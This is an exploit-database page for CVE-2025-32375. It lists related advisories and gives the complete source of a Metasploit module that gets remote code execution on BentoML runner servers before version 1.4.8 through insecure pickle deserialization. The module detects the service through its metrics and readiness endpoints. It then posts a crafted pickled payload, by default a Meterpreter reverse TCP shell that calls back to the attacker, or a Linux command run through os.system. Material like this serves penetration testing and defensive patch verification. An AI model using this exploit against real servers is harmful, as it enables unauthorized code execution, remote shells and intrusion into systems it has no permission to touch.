📄 BentoML Runner Server Remote Code Execution

🗓️ 23 Apr 2025 00:00:00Reported by SeaWind, Takahiro YokoyamaType

packetstorm🔗 packetstorm.news👁 490 Views

BentoML's runner server is vulnerable to remote code execution due to insecure deserialization.

Reporter	Title	Published	Views	Family All 23
GithubExploit	Exploit for Deserialization of Untrusted Data in Bentoml	3 May 202519:04	–	githubexploit
Tenable Nessus	BentoML 1.x < 1.4.8 Arbitrary Code Execution	6 May 202500:00	–	nessus
Tenable Nessus	BentoML 1.x < 1.4.8 Insecure Deserialization	5 Aug 202500:00	–	nessus
Circl	CVE-2025-32375	8 Apr 202523:54	–	circl
CNNVD	BentoML 代码问题漏洞	9 Apr 202500:00	–	cnnvd
CVE	CVE-2025-32375	9 Apr 202515:30	–	cve
Cvelist	CVE-2025-32375 Insecure Deserialization leads to RCE in BentoML's runner server	9 Apr 202515:30	–	cvelist
Github Security Blog	BentoML's runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization	9 Apr 202512:59	–	github
Metasploit	BentoML's runner server RCE	23 Apr 202518:50	–	metasploit
NVD	CVE-2025-32375	9 Apr 202516:15	–	nvd

##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'BentoML\'s runner server RCE',
            'Description' => %q{
              There was an insecure deserialization in BentoML's runner server prior to version 1.4.8.
              By setting specific headers and parameters in the POST request, it is possible to execute unauthorized arbitrary code in the context of the user running the server,
              which will grant initial access and information disclosure.
            },
            'Author' => [
              'SeaWind',          # Vulnerability discovery and PoC
              'Takahiro Yokoyama' # Metasploit module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2025-32375'],
              ['URL', 'https://github.com/advisories/GHSA-7v4r-c989-xh26'],
            ],
            'Targets' => [
              [
                'Python payload',
                {
                  'Arch' => ARCH_PYTHON,
                  'Platform' => 'python',
                  'Type' => :python,
                  'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
                }
              ],
              [
                'Linux Command', {
                  'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
                  'DefaultOptions' => {
                    # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
                    'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
                  }
                }
              ],
            ],
            'DefaultOptions' => {
              'FETCH_DELETE' => true
            },
            'DefaultTarget' => 0,
            'DisclosureDate' => '2025-04-09',
            'Notes' => {
              'Stability' => [ CRASH_SAFE, ],
              'SideEffects' => [ IOC_IN_LOGS ],
              'Reliability' => [ REPEATABLE_SESSION, ]
            }
          )
        )
        register_options(
          [
            Opt::RPORT(3000)
          ]
        )
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'metrics')
        })
        return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
        return Exploit::CheckCode::Unknown('BentoML\'s runner server not detected.') unless res&.get_html_document&.text&.include?('bentoml_runner')
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'readyz')
        })
        return Exploit::CheckCode::Unknown('BentoML\'s runner server not ready.') unless res&.code == 200
    
        Exploit::CheckCode::Detected("BentoML\'s runner server detected.")
        # Version check not available
      end
    
      def exploit
        if target['Type'] == :python
          pl = payload.encoded
        else
          pl = "import os;os.system(\"\"\"\n#{payload.encoded}\n\"\"\")"
        end
    
        send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path),
          'headers' => {
            'args-number' => '1',
            'Content-Type' => 'application/vnd.bentoml.pickled',
            'Payload-Container' => 'NdarrayContainer',
            'Payload-Meta' => '{"format": "default"}',
            'Batch-Size' => '-1'
          },
          'data' => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, pl)
        })
        # No response check here
      end
    
    end

23 Apr 2025 00:00Current

9.2High risk

Vulners AI Score9.2

CVSS 3.19.8

EPSS0.65238

SSVC